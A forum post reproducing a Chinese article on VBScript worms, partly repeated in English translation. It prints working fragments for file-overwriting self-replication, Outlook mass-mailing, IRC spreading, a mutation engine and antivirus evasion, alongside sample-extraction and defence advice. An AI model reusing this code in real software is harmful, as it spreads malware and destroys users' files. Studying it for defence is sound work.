『第 14 楼』:
使用 LLM 解释/回答一下
VBS脚本病毒
网络的流行,让我们的世界变得更加美好,但它也有让人不愉快的时候。当您收到一封主题为“I Love You”的邮件,用兴奋得几乎快发抖的鼠标去点击附件的时候;当您浏览一个信任的网站之后,发现打开每个文件夹的速度非常慢的时候,您是否察觉病毒已经闯进了您的世界呢?2000年5月4日欧美爆发的“爱虫”网络蠕虫病毒。由于通过电子邮件系统传播,爱虫病毒在短短几天内狂袭全球数百万计的电脑。微软、Intel等在内的众多大型企业网络系统瘫痪,全球经济损失达几十亿美元。而去年爆发的新欢乐时光病毒至今都让广大电脑用户更是苦不堪言。
上面提及的两个病毒最大的一个共同特点是:使用VBScript编写。以爱虫和新欢乐时光病毒为典型代表的VBS脚本病毒十分的猖獗,很重要的一个原因就是其编写简单。下面我们就来逐一对VBS脚本病毒的各个方面加以分析:
一、Vbs脚本病毒的特点及发展现状
VBS病毒是用VB Script编写而成,该脚本语言功能非常强大,它们利用Windows系统的开放性特点,通过调用一些现成的Windows对象、组件,可以直接对文件系统、注册表等进行控制,功能非常强大。应该说病毒就是一种思想,但是这种思想在用VBS实现时变得极其容易。VBS脚本病毒具有如下几个特点:
1.编写简单,一个以前对病毒一无所知的病毒爱好者可以在很短的时间里编出一个新型病毒来。
2.破坏力大。其破坏力不仅表现在对用户系统文件及性能的破坏。他还可以使邮件服务器崩溃,网络发生严重阻塞。
3.感染力强。由于脚本是直接解释执行,并且它不需要像PE病毒那样,需要做复杂的PE文件格式处理,因此这类病毒可以直接通过自我复制的方式感染其他同类文件,并且自我的异常处理变得非常容易。
4.传播范围大。这类病毒通过htm文档,Email附件或其它方式,可以在很短时间内传遍世界各地。
5.病毒源码容易被获取,变种多。由于VBS病毒解释执行,其源代码可读性非常强,即使病毒源码经过加密处理后,其源代码的获取还是比较简单。因此,这类病毒变种比较多,稍微改变一下病毒的结构,或者修改一下特征值,很多杀毒软件可能就无能为力。
6.欺骗性强。脚本病毒为了得到运行机会,往往会采用各种让用户不大注意的手段,譬如,邮件的附件名采用双后缀,如.jpg.vbs,由于系统默认不显示后缀,这样,用户看到这个文件的时候,就会认为它是一个jpg图片文件。
7.使得病毒生产机实现起来非常容易。所谓病毒生产机,就是可以按照用户的意愿,生产病毒的机器(当然,这里指的是程序),目前的病毒生产机,之所以大多数都为脚本病毒生产机,其中最重要的一点还是因为脚本是解释执行的,实现起来非常容易,具体将在我们后面谈及。
正因为以上几个特点,脚本病毒发展异常迅猛,特别是病毒生产机的出现,使得生成新型脚本病毒变得非常容易。
二、Vbs脚本病毒原理分析
1.vbs脚本病毒如何感染、搜索文件
VBS脚本病毒一般是直接通过自我复制来感染文件的,病毒中的绝大部分代码都可以直接附加在其他同类程序的中间,譬如新欢乐时光病毒可以将自己的代码附加在.htm文件的尾部,并在顶部加入一条调用病毒代码的语句,而爱虫病毒则是直接生成一个文件的副本,将病毒代码拷入其中,并以原文件名作为病毒文件名的前缀,vbs作为后缀。下面我们通过爱虫病毒的部分代码具体分析一下这类病毒的感染和搜索原理:
以下是文件感染的部分关键代码:
Set fso=createobject("scripting.filesystemobject") '创建一个文件系统对象
set self=fso.opentextfile(wscript.scriptfullname,1) '读打开当前文件(即病毒本身)
vbscopy=self.readall ' 读取病毒全部代码到字符串变量vbscopy……
set ap=fso.opentextfile(目标文件.path,2,true) ' 写打开目标文件,准备写入病毒代码
ap.write vbscopy ' 将病毒代码覆盖目标文件
ap.close
set cop=fso.getfile(目标文件.path) '得到目标文件路径
cop.copy(目标文件.path & ".vbs") ' 创建另外一个病毒文件(以.vbs为后缀)
目标文件.delete(true) '删除目标文件
上面描述了病毒文件是如何感染正常文件的:首先将病毒自身代码赋给字符串变量vbscopy,然后将这个字符串覆盖写到目标文件,并创建一个以目标文件名为文件名前缀、vbs为后缀的文件副本,最后删勘晡募?BR>下面我们具体分析一下文件搜索代码:
'该函数主要用来寻找满足条件的文件,并生成对应文件的一个病毒副本
sub scan(folder_) 'scan函数定义,
on error resume next '如果出现错误,直接跳过,防止弹出错误窗口
set folder_=fso.getfolder(folder_)
set files=folder_.files ' 当前目录的所有文件集合
for each file in filesext=fso.GetExtensionName(file) '获取文件后缀
ext=lcase(ext) '后缀名转换成小写字母
if ext="mp5" then '如果后缀名是mp5,则进行感染。请自己建立相应后缀名的文件,最好是非正常后缀名 ,以免破坏正常程序。
Wscript.echo (file)
end if
next
set subfolders=folder_.subfolders
for each subfolder in subfolders '搜索其他目录;递归调用
scan( )
scan(subfolder)
next
end sub
上面的代码就是VBS脚本病毒进行文件搜索的代码分析。搜索部分scan( )函数做得比较短小精悍,非常巧妙,采用了一个递归的算法遍历整个分区的目录和文件。
2.vbs脚本病毒通过网络传播的几种方式及代码分析
VBS脚本病毒之所以传播范围广,主要依赖于它的网络传播功能,一般来说,VBS脚本病毒采用如下几种方式进行传播:
1)通过Email附件传播
这是一种用的非常普遍的传播方式,病毒可以通过各种方法拿到合法的Email地址,最常见的就是直接取outlook地址簿中的邮件地址,也可以通过程序在用户文档(譬如htm文件)中搜索Email地址。
下面我们具体分析一下VBS脚本病毒是如何做到这一点的:
Function mailBroadcast()
on error resume next
wscript.echo
Set outlookApp = CreateObject("Outlook.Application") //创建一个OUTLOOK应用的对象
If outlookApp= "Outlook" Then
Set mapiObj=outlookApp.GetNameSpace("MAPI") //获取MAPI的名字空间
Set addrList= mapiObj.AddressLists //获取地址表的个数
For Each addr In addrList
If addr.AddressEntries.Count <> 0 Then
addrEntCount = addr.AddressEntries.Count //获取每个地址表的Email记录数
For addrEntIndex= 1 To addrEntCount //遍历地址表的Email地址
Set item = outlookApp.CreateItem(0) //获取一个邮件对象实例
Set addrEnt = addr.AddressEntries(addrEntIndex) //获取具体Email地址
item.To = addrEnt.Address //填入收信人地址 item.Subject = "病毒传播实验" //写入邮件标题
item.Body = "这里是病毒邮件传播测试,收到此信请不要慌张!" //写入文件内容
Set attachMents=item.Attachments //定义邮件附件
attachMents.Add fileSysObj.GetSpecialFolder(0) & "\test.jpg.vbs"
item.DeleteAfterSubmit = True //信件提交后自动删除
If item.To <> "" Then
item.Send //发送邮件
shellObj.regwrite "HKCU\software\Mailtest\mailed", "1" //病毒标记,以免重复感染
End If
Next
End If
Next
End if
End Function
2)通过局域网共享传播
局域网共享传播也是一种非常普遍并且有效的网络传播方式。一般来说,为了局域网内交流方便,一定存在不少共享目录,并且具有可写权限,譬如win2000创建共享时,默认就是具有可写权限。这样病毒通过搜索这些共享目录,就可以将病毒代码传播到这些目录之中。
在VBS中,有一个对象可以实现网上邻居共享文件夹的搜索与文件操作。我们利用该对象就可以达到传播的目的。
welcome_msg = "网络连接搜索测试"
Set WSHNetwork = WScript.CreateObject("WScript.Network") ’创建一个网络对象
Set oPrinters = WshNetwork.EnumPrinterConnections ’创建一个网络打印机连接列表
WScript.Echo "Network printer mappings:"
For i = 0 to oPrinters.Count - 1 Step 2 ’显示网络打印机连接情况
WScript.Echo "Port " & oPrinters.Item(i) & " = " & oPrinters.Item(i+1)
Next
Set colDrives = WSHNetwork.EnumNetworkDrives ’创建一个网络共享连接列表
If colDrives.Count = 0 Then
MsgBox "没有可列出的驱动器。", vbInformation + vbOkOnly,welcome_msg
Else
strMsg = "当前网络驱动器连接: " & CRLF
For i = 0 To colDrives.Count - 1 Step 2
strMsg = strMsg & Chr(13) & Chr(10) & colDrives(i) & Chr(9) & colDrives(i + 1)
Next
MsgBox strMsg, vbInformation + vbOkOnly, welcome_msg’显示当前网络驱动器连接
End If
上面是一个用来寻找当前打印机连接和网络共享连接并将它们显示出来的完整脚本程序。在知道了共享连接之后,我们就可以直接向目标驱动器读写文件了。
3)通过感染htm、asp、jsp、php等网页文件传播
如今,WWW服务已经变得非常普遍,病毒通过感染htm等文件,势必会导致所有访问过该网页的用户机器感染病毒。
病毒之所以能够在htm文件中发挥强大功能,采用了和绝大部分网页恶意代码相同的原理。基本上,它们采用了相同的代码,不过也可以采用其它代码,这段代码是病毒FSO,WSH等对象能够在网页中运行的关键。在注册表HKEY_CLASSES_ROOT\CLSID\下我们可以找到这么一个主键{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B},注册表中对它他的说明是“Windows Script Host Shell Object”,同样,我们也可以找到{0D43FE01-F093-11CF-8940-00A0C9054228},注册表对它的说明是“FileSystem Object”,一般先要对COM进行初始化,在获取相应的组件对象之后,病毒便可正确地使用FSO、WSH两个对象,调用它们的强大功能。代码如下所示:
Set Apple0bject = document.applets("KJ_guest")
Apple0bject.setCLSID("{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}")
Apple0bject.createInstance() ’创建一个实例
Set WsShell Apple0bject.Get0bject()
Apple0bject.setCLSID("{0D43FE01-F093-11CF-8940-00A0C9054228}")
Apple0bject.createInstance() ’创建一个实例
Set FSO = Apple0bject.Get0bject()
对于其他类型文件,这里不再一一分析。
4)通过IRC聊天通道传播
病毒通过IRC传播一般来说采用以下代码(以MIRC为例)
Dim mirc
set fso=CreateObject("Scripting.FileSystemObject")
set mirc=fso.CreateTextFile("C:\mirc\script.ini") ’创建文件script.ini
fso.CopyFile Wscript.ScriptFullName, "C:\mirc\attachment.vbs", True ’将病毒文件备份到attachment.vbs
mirc.WriteLine "[script]"
mirc.WriteLine "n0=on 1:join:*.*: { if ( $nick !=$me ) {halt} /dcc send $nick C:\mirc\attachment.vbs }"
'利用命令/ddc send $nick attachment.vbs给通道中的其他用户传送病毒文件
mirc.Close
以上代码用来往Script.ini文件中写入一行代码,实际中还会写入很多其他代码。Script.ini中存放着用来控制IRC会话的命令,这个文件里面的命令是可以自动执行的。譬如,“歌虫”病毒TUNE.VBS就会修改c:\mirc\script.ini 和 c:\mirc\mirc.ini,使每当IRC用户使用被感染的通道时都会收到一份经由DDC发送的TUNE.VBS。同样,如果Pirch98已安装在目标计算机的c:\pirch98目录下,病毒就会修改c:\pirch98\events.ini和c:\pirch98\pirch98.ini,使每当IRC用户使用被感染的通道时都会收到一份经由DDC发送的TUNE.VBS。
另外病毒也可以通过现在广泛流行的KaZaA进行传播。病毒将病毒文件拷贝到KaZaA的默认共享目录中,这样,当其他用户访问这台机器时,就有可能下载该病毒文件并执行。这种传播方法可能会随着KaZaA这种点对点共享工具的流行而发生作用。
还有一些其他的传播方法,我们这里不再一一列举。
3.VBS脚本病毒如何获得控制权
如何获取控制权?这一个是一个比较有趣的话题,而VBS脚本病毒似乎将这个话题发挥的淋漓尽致。笔者在这里列出几种典型的方法:
1)修改注册表项
windows在启动的时候,会自动加载HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run项下的各键值所执向的程序。脚本病毒可以在此项下加入一个键值指向病毒程序,这样就可以保证每次机器启动的时候拿到控制权。vbs修改贮册表的方法比较简单,直接调用下面语句即可。
wsh.RegWrite(strName, anyvalue [,strType])
2)通过映射文件执行方式
譬如,我们新欢乐时光将dll的执行方式修改为wscript.exe。甚至可以将exe文件的映射指向病毒代码。
3)欺骗用户,让用户自己执行
这种方式其实和用户的心理有关。譬如,病毒在发送附件时,采用双后缀的文件名,由于默认情况下,后缀并不显示,举个例子,文件名为beauty.jpg.vbs的vbs程序显示为beauty.jpg,这时用户往往会把它当成一张图片去点击。同样,对于用户自己磁盘中的文件,病毒在感染它们的时候,将原有文件的文件名作为前缀,vbs作为后缀产生一个病毒文件,并删除原来文件,这样,用户就有可能将这个vbs文件看作自己原来的文件运行。
4)desktop.ini和folder.htt互相配合
这两个文件可以用来配置活动桌面,也可以用来自定义文件夹。如果用户的目录中含有这两个文件,当用户进入该目录时,就会触发folder.htt中的病毒代码。这是新欢乐时光病毒采用的一种比较有效的获取控制权的方法。并且利用folder.htt,还可能触发exe文件,这也可能成为病毒得到控制权的一种有效方法!
病毒获得控制权的方法还有很多,这方面作者发挥的余地也比较大。
4.vbs脚本病毒对抗反病毒软件的几种技巧
病毒要生存,对抗反病毒软件的能力也是必需的。一般来说,VBS脚本病毒采用如下几种对抗反病毒软件的方法:
1)自加密
譬如,新欢乐时光病毒,它可以随机选取密钥对自己的部分代码进行加密变换,使得每次感染的病毒代码都不一样,达到了多态的效果。这给传统的特征值查毒法带来了一些困难。病毒也还可以进一步的采用变形技术,使得每次感染后的加密病毒的解密后的代码都不一样。
下面看一个简单的vbs脚本变形引擎(来自flyshadow)
Randomize
Set Of = CreateObject("Scripting.FileSystemObject") ’创建文件系统对象
vC = Of.OpenTextFile(WScript.ScriptFullName, 1).Readall ’读取自身代码
fS = Array("Of", "vC", "fS", "fSC") ’定义一个即将被替换字符的数组
For fSC = 0 To 3
vC = Replace(vC, fS(fSC), Chr((Int(Rnd * 22) + 65)) & Chr((Int(Rnd * 22) + 65)) & Chr((Int(Rnd * 22) + 65)) & Chr((Int(Rnd * 22) + 65))) ’取4个随机字符替换数组fS中的字符串
Next
Of.OpenTextFile(WScript.ScriptFullName, 2, 1).Writeline vC ’将替换后的代码写回文件
上面这段代码使得该VBS文件在每次运行后,其Of,vC,fS,fSC四字符串都会用随机字符串来代替,这在很大程度上可以防止反病毒软件用特征值查毒法将其查出。
2)巧妙运用Execute函数
用过VBS程序的朋友是否会觉得奇怪:当一个正常程序中用到了FileSystemObject对象的时候,有些反病毒软件会在对这个程序进行扫描的时候报告说此Vbs文件的风险为高,但是有些VBS脚本病毒同样采用了FileSystemObject对象,为什么却又没有任何警告呢?原因很简单,就是因为这些病毒巧妙的运用了Execute方法。有些杀毒软件检测VBS病毒时,会检查程序中是否声明使用了FileSystemObject对象,如果采用了,这会发出报警。如果病毒将这段声明代码转化为字符串,然后通过Execute(String)函数执行,就可以躲避某些反病毒软件。
3)改变某些对象的声明方法
譬如fso=createobject("scripting.filesystemobject"),我们将其改变为
fso=createobject("script"+"ing.filesyste"+"mobject"),这样反病毒软件对其进行静态扫描时就不会发现filesystemobject对象。
4)直接关闭反病毒软件
VBS脚本功能强大,它可以直接在搜索用户进程然后对进程名进行比较,如果发现是反病毒软件的进程就直接关闭,并对它的某些关键程序进行删除。
5.Vbs病毒生产机的原理介绍
所谓病毒生产机就是指可以直接根据用户的选择产生病毒源代码的软件。在很多人看来这或许不可思议,其实对脚本病毒而言它的实现非常简单。
脚本语言是解释执行的、不需要编译,程序中不需要什么校验和定位,每条语句之间分隔得比较清楚。这样,先将病毒功能做成很多单独的模块,在用户做出病毒功能选择后,生产机只需要将相应的功能模块拼凑起来,最后再作相应的代码替换和优化即可。由于篇幅关系和其他原因,这里不作详细介绍。
三、如何防范vbs脚本病毒
1.如何从样本中提取(加密)脚本病毒
对于没有加密的脚本病毒,我们可以直接从病毒样本中找出来,现在介绍一下如何从病毒样本中提取加密VBS脚本病毒,这里我们以新欢乐时光为例。
用JediEdit打开folder.htt。我们发现这个文件总共才93行,第一行<BODY onload="vbscript:KJ_start()">,几行注释后,以<html>开始,</html>节尾。相信每个人都知道这是个什么类型的文件吧!
第87行到91行,是如下语句:
87:<script language=vbscript>
88:ExeString = "Afi FkSeboa)EqiiQbtq)S^pQbtq)AadobaPfdj)>mlibL^gb`p)CPK...;后面省略,很长!
89:Execute("Dim KeyArr(3),ThisText"&vbCrLf&"KeyArr(0) = 3"&vbCrLf&"KeyArr(1) = 3"&vbCrLf&"KeyArr(2) = 3"&vbCrLf&"KeyArr(3) = 4"&vbCrLf&"For i=1 To Len(ExeString)"&vbCrLf&"TempNum = Asc(Mid(ExeString,i,1))"&vbCrLf&"If TempNum = 18 Then"&vbCrLf&"TempNum = 34"&vbCrLf&"End If"&vbCrLf&"TempChar = Chr(TempNum + KeyArr(i Mod 4))"&vbCrLf&"If TempChar = Chr(28) Then"&vbCrLf&"TempChar = vbCr"&vbCrLf&"ElseIf TempChar = Chr(29) Then"&vbCrLf&"TempChar = vbLf"&vbCrLf&"End If"&vbCrLf&"ThisText = ThisText & TempChar"&vbCrLf&"Next") 90:Execute(ThisText) 91:</script>
第87和91行不用解释了,第88行是一个字符串的赋值,很明显这是被加密过的病毒代码。看看89行最后的一段代码ThisText = ThisText & TempChar,再加上下面那一行,我们肯定能够猜到ThisText里面放的是病毒解密代码(熟悉vbs的兄弟当然也可以分析一下这段解密代码,too simple!就算完全不看代码也应该可以看得出来的)。第90行是执行刚才ThisText中的那段代码(经过解密处理后的代码)。
那么,下一步该怎么做呢?很简单,我们只要在病毒代码解密之后,将ThisText的内容输出到一个文本文件就可以解决了。由于上面几行是vbscript,于是我创建了如下一个.txt文件:
首先,copy第88、89两行到刚才建立的.txt文件,当然如果你愿意看看新欢乐时光的执行效果,你也可以在最后输入第90行。然后在下面一行输入创建文件和将ThisText写入文件vbs代码,整个文件如下所示:
ExeString = "Afi... ’ 第88行代码 Execute("Dim KeyAr... ’ 第89行代码
set fso=createobject("scripting.filesystemobject") ’ 创建一个文件系统对象
set virusfile=fso.createtextfile("resource.log",true) ’ 创建一个新文件resource.log,用以存放解密后的病毒代码 virusfile.writeline(ThisText) ’ 将解密后的代码写入resource.log
OK!就这么简单,保存文件,将该文件后缀名.txt改为.vbs(.vbe也可以),双击,你会发现该文件目录下多了一个文件resource.log,打开这个文件,怎么样?是不是“新欢乐时光”的源代码啊!
2.vbs脚本病毒的弱点
vbs脚本病毒由于其编写语言为脚本,因而它不会像PE文件那样方便灵活,它的运行是需要条件的(不过这种条件默认情况下就具备了)。笔者认为,VBS脚本病毒具有如下弱点:
1)绝大部分VBS脚本病毒运行的时候需要用到一个对象:FileSystemObject
2)VBScript代码是通过Windows Script Host来解释执行的。
3)VBS脚本病毒的运行需要其关联程序Wscript.exe的支持。
4)通过网页传播的病毒需要ActiveX的支持
5)通过Email传播的病毒需要OE的自动发送邮件功能支持,但是绝大部分病毒都是以Email为主要传播方式的。
3.如何预防和解除vbs脚本病毒
针对以上提到的VBS脚本病毒的弱点,笔者提出如下集中防范措施:
1)禁用文件系统对象FileSystemObject
方法:用regsvr32 scrrun.dll /u这条命令就可以禁止文件系统对象。其中regsvr32是Windows\System下的可执行文件。或者直接查找scrrun.dll文件删除或者改名。
还有一种方法就是在注册表中HKEY_CLASSES_ROOT\CLSID\下找到一个主键{0D43FE01-F093-11CF-8940-00A0C9054228}的项,咔嚓即可。
2)卸载Windows Scripting Host
在Windows 98中(NT 4.0以上同理),打开[控制面板]→[添加/删除程序]→[Windows安装程序]→[附件],取消“Windows Scripting Host”一项。
和上面的方法一样,在注册表中HKEY_CLASSES_ROOT\CLSID\下找到一个主键{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}的项,咔嚓。
3)删除VBS、VBE、JS、JSE文件后缀名与应用程序的映射
点击[我的电脑]→[查看]→[文件夹选项]→[文件类型],然后删除VBS、VBE、JS、JSE文件后缀名与应用程序的映射。
4)在Windows目录中,找到WScript.exe,更改名称或者删除,如果你觉得以后有机会用到的话,最好更改名称好了,当然以后也可以重新装上。
5)要彻底防治VBS网络蠕虫病毒,还需设置一下你的浏览器。我们首先打开浏览器,单击菜单栏里“Internet 选项”安全选项卡里的[自定义级别]按钮。把“ActiveX控件及插件”的一切设为禁用,这样就不怕了。呵呵,譬如新欢乐时光的那个ActiveX组件如果不能运行,网络传播这项功能就玩完了。
6)禁止OE的自动收发邮件功能
7)由于蠕虫病毒大多利用文件扩展名作文章,所以要防范它就不要隐藏系统中已知文件类型的扩展名。Windows默认的是“隐藏已知文件类型的扩展名称”,将其修改为显示所有文件类型的扩展名称。
8)将系统的网络连接的安全级别设置至少为“中等”,它可以在一定程度上预防某些有害的Java程序或者某些ActiveX组件对计算机的侵害。
9)呵呵,最后一项不说大家也应该知道了,杀毒软件确实很必要,尽管有些杀毒软件挺让广大用户失望,不过,选择是双方的哦。在这个病毒横飞的网络,如果您的机器没有装上杀毒软件我觉得确实挺不可思议的。
四、对所有脚本类病毒发展的展望
随着网络的飞速发展,网络蠕虫病毒开始流行,而VBS脚本蠕虫则更加突出,不仅数量多,而且威力大。由于利用脚本编写病毒比较简单,除了将继续流行目前的VBS脚本病毒外,将会逐渐出现更多的其它脚本类病毒,譬如PHP,JS,Perl病毒等。
但是脚本并不是真正病毒技术爱好者编写病毒的最佳工具,并且脚本病毒解除起来比较容易、相对容易防范。笔者认为,脚本病毒仍将继续流行,但是能够具有像爱虫、新欢乐时光那样大影响的脚本蠕虫病毒只是少数。
### VBS Script Virus
The popularity of the network has made our world more beautiful, but it also has unpleasant times. When you receive an email with the subject "I Love You" and click on the attachment with a mouse that's almost trembling with excitement; when you browse a trusted website and find that the speed of opening each folder is very slow, do you notice that the virus has invaded your world? The "Love Bug" network worm virus erupted in Europe and the United States on May 4, 2000. Due to its spread through the email system, the Love Bug virus swept through millions of computers worldwide in just a few days. The network systems of many large enterprises such as Microsoft and Intel were paralyzed, and global economic losses reached several billion US dollars. The newly erupted New Love Time virus last year still makes computer users extremely miserable.
The biggest common feature of the two viruses mentioned above is: they are written using VBScript. The reason why VBS script viruses represented by the Love Bug and New Love Time viruses are extremely rampant is that it is very easy to write them. Now we will analyze various aspects of VBS script viruses one by one:
#### I. Characteristics and Development Status of Vbs Script Viruses
VBS viruses are written in VB Script. This script language is very powerful. They use the open nature of the Windows system, and by calling some ready-made Windows objects and components, they can directly control the file system, registry, etc., and are very powerful. It should be said that a virus is an idea, but this idea becomes extremely easy to implement with VBS. VBS script viruses have the following characteristics:
1. Easy to write. A virus enthusiast who knows nothing about viruses can create a new virus in a very short time.
2. Great destructive power. Its destructive power is not only manifested in the destruction of the user's system files and performance. It can also make the email server crash and the network seriously blocked.
3. Strong infectivity. Since the script is directly interpreted and executed, and it does not need to do complex PE file format processing like PE viruses, such viruses can directly infect other similar files by self-replication, and self-abnormal handling becomes very easy.
4. Wide spread range. Such viruses can spread all over the world in a very short time through htm documents, Email attachments or other methods.
5. The virus source code is easy to obtain and has many variants. Since VBS viruses are interpreted and executed, their source code is very readable. Even if the virus source code is encrypted, it is relatively easy to obtain the source code. Therefore, there are many variants of such viruses. If the structure of the virus is slightly changed or the characteristic value is modified, many anti-virus software may be unable to do anything.
6. Strong deception. In order to get the chance to run, script viruses often use various means that users don't pay much attention to. For example, the attachment name of the email uses a double suffix, such as.jpg.vbs. Since the system does not display the suffix by default, when the user sees this file, they will think it is a jpg image file.
7. Makes it very easy to implement a virus generator. The so-called virus generator is a machine (of course, referring to a program) that can produce viruses according to the user's wishes. Currently, most virus generators are script virus generators. The most important reason is that the script is interpreted and executed, and it is very easy to implement, which will be discussed later.
Because of the above characteristics, script viruses have developed extremely rapidly. Especially the appearance of virus generators has made it very easy to generate new script viruses.
#### II. Principle Analysis of Vbs Script Viruses
1. How Vbs Script Viruses Infect and Search for Files
VBS script viruses generally infect files directly through self-replication. Most of the code in the virus can be directly attached in the middle of other similar programs. For example, the New Love Time virus can attach its own code to the end of the.htm file and add a statement to call the virus code at the top. The Love Bug virus directly generates a copy of a file, copies the virus code into it, and uses the original file name as the prefix of the virus file name and.vbs as the suffix. The following is a specific analysis of the infection and search principles of such viruses through part of the code of the Love Bug virus:
The following is part of the key code for file infection:
Set fso = createobject("scripting.filesystemobject") 'Create a file system object
set self = fso.opentextfile(wscript.scriptfullname, 1) 'Read and open the current file (i.e., the virus itself)
vbscopy = self.readall 'Read the entire virus code into the string variable vbscopy...
set ap = fso.opentextfile(目标文件.path, 2, true) 'Write and open the target file, ready to write virus code
ap.write vbscopy 'Cover the target file with the virus code
ap.close
set cop = fso.getfile(目标文件.path) 'Get the target file path
cop.copy(目标文件.path & ".vbs") 'Create another virus file (with.vbs as the suffix)
目标文件.delete(true) 'Delete the target file
The above describes how the virus file infects the normal file: first, the virus's own code is assigned to the string variable vbscopy, then this string is overwritten and written to the target file, and a file copy with the target file name as the file name prefix and.vbs as the suffix is created, and finally the target file is deleted.
The following is a specific analysis of the file search code:
' This function is mainly used to find files that meet the conditions and generate a virus copy of the corresponding file
sub scan(folder_) 'Define the scan function
on error resume next 'If an error occurs, skip directly to prevent popping up an error window
set folder_ = fso.getfolder(folder_)
set files = folder_.files 'Collection of all files in the current directory
for each file in files
ext = fso.GetExtensionName(file) 'Get the file suffix
ext = lcase(ext) 'Convert the suffix name to lowercase letters
if ext = "mp5" then 'If the suffix name is mp5, perform infection. Please create corresponding files with suffix names by yourself, preferably abnormal suffix names, so as not to damage normal programs.
Wscript.echo (file)
end if
next
set subfolders = folder_.subfolders
for each subfolder in subfolders 'Search other directories; recursive call
scan( )
scan(subfolder)
next
end sub
The above code is the code analysis of the file search of the VBS script virus. The search part of the scan( ) function is relatively concise and clever, and uses a recursive algorithm to traverse the directories and files of the entire partition.
2. Several Ways of Network Spread of Vbs Script Viruses and Code Analysis
The wide spread range of VBS script viruses mainly depends on its network spread function. Generally speaking, VBS script viruses spread in the following ways:
1) Spread through Email attachments
This is a very common spread method. The virus can obtain legal Email addresses through various methods. The most common is to directly take the email addresses in the Outlook address book, or search for Email addresses in the user's documents (such as htm files) through the program.
The following is a specific analysis of how the VBS script virus does this:
Function mailBroadcast()
on error resume next
wscript.echo
Set outlookApp = CreateObject("Outlook.Application") //Create an object of the OUTLOOK application
If outlookApp = "Outlook" Then
Set mapiObj = outlookApp.GetNameSpace("MAPI") //Get the namespace of MAPI
Set addrList = mapiObj.AddressLists //Get the number of address tables
For Each addr In addrList
If addr.AddressEntries.Count <> 0 Then
addrEntCount = addr.AddressEntries.Count //Get the number of Email records in each address table
For addrEntIndex = 1 To addrEntCount //Traverse the Email addresses in the address table
Set item = outlookApp.CreateItem(0) //Get an instance of the mail object
Set addrEnt = addr.AddressEntries(addrEntIndex) //Get the specific Email address
item.To = addrEnt.Address //Fill in the recipient address item.Subject = "Virus Spread Experiment" //Write the email title
item.Body = "This is a virus email spread test, please don't panic when you receive this letter!" //Write the file content
Set attachMents = item.Attachments //Define the email attachment
attachMents.Add fileSysObj.GetSpecialFolder(0) & "\test.jpg.vbs"
item.DeleteAfterSubmit = True //The letter is automatically deleted after submission
If item.To <> "" Then
item.Send //Send the email
shellObj.regwrite "HKCU\software\Mailtest\mailed", "1" //Virus mark to avoid repeated infection
End If
Next
End If
Next
End if
End Function
2) Spread through LAN sharing
LAN sharing spread is also a very common and effective network spread method. Generally speaking, in order to facilitate communication within the LAN, there must be many shared directories with writable permissions. For example, when Windows 2000 creates a share, it has writable permissions by default. In this way, the virus can spread the virus code to these directories by searching these shared directories.
In VBS, there is an object that can implement the search of shared folders on the network neighborhood and file operations. We can use this object to achieve the purpose of spread.
welcome_msg = "Network Connection Search Test"
Set WSHNetwork = WScript.CreateObject("WScript.Network") 'Create a network object
Set oPrinters = WshNetwork.EnumPrinterConnections 'Create a network printer connection list
WScript.Echo "Network printer mappings:"
For i = 0 to oPrinters.Count - 1 Step 2 'Display the network printer connection situation
WScript.Echo "Port " & oPrinters.Item(i) & " = " & oPrinters.Item(i+1)
Next
Set colDrives = WSHNetwork.EnumNetworkDrives 'Create a network shared connection list
If colDrives.Count = 0 Then
MsgBox "No drives to list.", vbInformation + vbOkOnly,welcome_msg
Else
strMsg = "Current network drive connections: " & CRLF
For i = 0 To colDrives.Count - 1 Step 2
strMsg = strMsg & Chr(13) & Chr(10) & colDrives(i) & Chr(9) & colDrives(i + 1)
Next
MsgBox strMsg, vbInformation + vbOkOnly, welcome_msg'Display the current network drive connections
End If
The above is a complete script program used to find the current printer connections and network shared connections and display them. After knowing the shared connections, we can directly read and write files to the target drive.
3) Spread by infecting web files such as htm, asp, jsp, php
Nowadays, WWW services have become very common. The virus will inevitably cause the user's machines that have visited the web page to be infected with the virus by infecting htm files.
The reason why the virus can play a powerful role in htm files is that it uses the same principle as most web malicious codes. Basically, they use the same code, but other codes can also be used. This code is the key for the virus FSO, WSH and other objects to run in the web page. In the registry HKEY_CLASSES_ROOT\CLSID\, we can find such a key {F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}, and the description in the registry is "Windows Script Host Shell Object". Similarly, we can also find {0D43FE01-F093-11CF-8940-00A0C9054228}, and the description in the registry is "FileSystem Object". Generally, we need to initialize COM first. After obtaining the corresponding component objects, the virus can correctly use the FSO and WSH objects and call their powerful functions. The code is as follows:
Set Apple0bject = document.applets("KJ_guest")
Apple0bject.setCLSID("{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}")
Apple0bject.createInstance() 'Create an instance
Set WsShell Apple0bject.Get0bject()
Apple0bject.setCLSID("{0D43FE01-F093-11CF-8940-00A0C9054228}")
Apple0bject.createInstance() 'Create an instance
Set FSO = Apple0bject.Get0bject()
No further analysis will be made for other types of files here.
4) Spread through IRC chat channels
The virus generally uses the following code to spread through IRC (taking MIRC as an example)
Dim mirc
set fso=CreateObject("Scripting.FileSystemObject")
set mirc=fso.CreateTextFile("C:\mirc\script.ini") 'Create the file script.ini
fso.CopyFile Wscript.ScriptFullName, "C:\mirc\attachment.vbs", True 'Backup the virus file to attachment.vbs
mirc.WriteLine ""
mirc.WriteLine "n0=on 1:join:*.*: { if ( $nick !=$me ) {halt} /dcc send $nick C:\mirc\attachment.vbs }"
'Use the command /ddc send $nick attachment.vbs to send the virus file to other users in the channel
mirc.Close
The above code is used to write a line of code into the Script.ini file, and actually many other codes will be written. The commands in Script.ini are used to control the IRC session, and the commands in this file can be executed automatically. For example, the "Song Bug" virus TUNE.VBS will modify c:\mirc\script.ini and c:\mirc\mirc.ini so that whenever an IRC user uses the infected channel, they will receive a TUNE.VBS sent via DDC. Similarly, if Pirch98 is installed in the c:\pirch98 directory of the target computer, the virus will modify c:\pirch98\events.ini and c:\pirch98\pirch98.ini so that whenever an IRC user uses the infected channel, they will receive a TUNE.VBS sent via DDC.
In addition, the virus can also spread through the currently widely popular KaZaA. The virus copies the virus file to the default shared directory of KaZaA, so that when other users access this machine, they may download and execute the virus file. This spread method may play a role with the popularity of peer-to-peer sharing tools such as KaZaA.
There are some other spread methods, which will not be listed one by one here.
